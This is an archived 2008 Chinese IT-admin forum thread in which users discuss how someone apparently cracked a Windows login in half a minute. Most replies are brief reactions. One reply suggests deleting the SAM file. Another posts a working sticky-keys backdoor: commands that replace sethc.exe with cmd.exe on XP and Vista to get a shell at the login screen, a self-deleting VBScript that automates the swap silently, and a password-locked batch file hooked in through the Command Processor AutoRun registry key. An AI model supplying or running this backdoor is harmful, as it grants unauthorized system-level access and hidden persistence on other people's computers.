中国网管论坛's Archiver

xianjinghua 发表于 2008-3-10 10:06

他一定知道密码:loveliness:

jinhe 发表于 2008-3-12 16:10

额不知道,牛人!

shinesun 发表于 2008-3-12 18:48

想不明白。。。。。。。。。。。。。。。

a78216081 发表于 2008-3-13 18:38

佩服!高人

aieksi 发表于 2008-3-28 21:43

估计是周老虎啊

jmguo 发表于 2008-4-2 14:40

不知你的有没DOS状态,去DOS下
进winnt\system32\config 里
删除sam 文件,重启。OK。进系统了

kkorange 发表于 2008-4-2 17:16

楼主怎么不站出来讲清楚呢,事后你难道没问他怎么破戒密码的吗,你是不是在忽悠人啊

城市驴友 发表于 2008-4-3 09:43

在Windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。  

  XP:  

  将安装源光盘弹出(或将硬盘上的安装目录改名)  
  cd %widnir%\system32\dllcache  
  ren sethc.exe *.ex~  
  cd %widnir%\system32  
  copy /y cmd.exe sethc.exe  

  VISTA:  

  takeown /f c:\windows\system32\sethc.exe  
  cacls c:\windows\system32\sethc.exe /G administrator:F  
  然后按XP方法替换文件  

  在登录界面按5此SHIFT,出来cmd shell,然后……  

  后门扩展:  
  
  Dim obj, success  
  Set obj = CreateObject("WScript.Shell")  
  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)  
  success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)  
  success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)  
  success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)  
  success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)  
  success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)  

  第二句最有意思了。自动应答....以前就遇到过类似的问题  

  再更新.加个自删除,简化代码...  

  On Error Resume Next  
  Dim obj, success  
  Set obj = CreateObject("WScript.Shell")  
  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F? %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe? %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)  
  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
后门锁扩展:
  allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证
  用下面的后门锁的方法是 把代码保存为bdlock.bat
  然后修改注册表位置即可
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
  "AutoRun"="bdlock.bat"
  @Echo Off
  title 后门登陆验证
  color a
  cls
  set temprandom=%RANDOM%
  echo 请输入验证码:%temprandom%
  set/p check=
  if "%check%"=="%temprandom%%temprandom%" goto passcheck
  if "%check%"=="%temprandom%" (
  rem 后门服务器验证
  rem 如果没有后门验证服务器请rem注释掉下一行代码
  if exist \192.168.8.8\backdoor$\pass goto passcheck
  )
  echo 验证失败
  pause
  exit
  :passcheck
  echo 验证成功
  If "%passcmdlock%"=="http://blog.csdn.net/freexploit//" Goto endx
  Set passcmdlock=http://blog.csdn.net/freexploit/
  :allyesno
  Set Errorlevel=>nul
  Echo 请输入验证密码?
  Set password=allyesno Is a pig>nul
  Set/p password=
  rem 万能密码
  if "%password%"=="allyesno is a sb" goto endx
  If %time:~1,1%==0 Set timechange=a
  If %time:~1,1%==1 Set timechange=b
  If %time:~1,1%==2 Set timechange=c
  If %time:~1,1%==3 Set timechange=d
  If %time:~1,1%==4 Set timechange=e
  If %time:~1,1%==5 Set timechange=f
  If %time:~1,1%==6 Set timechange=g
  If %time:~1,1%==7 Set timechange=h
  If %time:~1,1%==8 Set timechange=i
  If %time:~1,1%==9 Set timechange=j
  set/a sum=%time:~1,1%+%time:~1,1%
  Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul  
  If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End
  Echo 请联系客服咨询正确密码!&Goto allyesno
  :End
  Set password=>nul
  Set Errorlevel=>nul
  Echo
  :endx

ws00866590 发表于 2008-4-3 09:58

NET USER.....................很简单啊!!!!!

菜鸟3 发表于 2008-4-3 14:59

学习中!:L:

00散步的鱼00 发表于 2008-4-4 17:29

学到了一点东西!!哈哈

8969222 发表于 2008-4-4 17:37

路过,有牛人啊......

zjdw 发表于 2008-4-9 16:13

:L: :L: :L:

mei113 发表于 2008-4-9 20:53

这么厉害 拿来学习下撒

:$: :$: :$: :$: :$: :$: :$: :$: :$:

i1do 发表于 2008-4-9 22:15

想学习诶:o: :o: :o:

wyyumi 发表于 2008-4-9 23:59

半分钟,太牛了,不知道输入法漏洞在WIN2K有没有效,

lnasjack 发表于 2008-4-10 12:55

牛人,没见过半分钟搞定的

blkt 发表于 2008-4-10 14:42

学习了。。。不明白。一般都用的ghost自带的工具破密
         :lol

wjhgood 发表于 2008-4-11 09:36

操,你直接问他不完了吗!

lyp1984 发表于 2008-4-11 11:48

有这个工具的发上来分享一下!

页: 2 3 4 5 6 7 8 9 10 11 [12] 13 14

Powered by Discuz! Archiver 6.1.0  © 1999-2008 bbs.bitsCN.com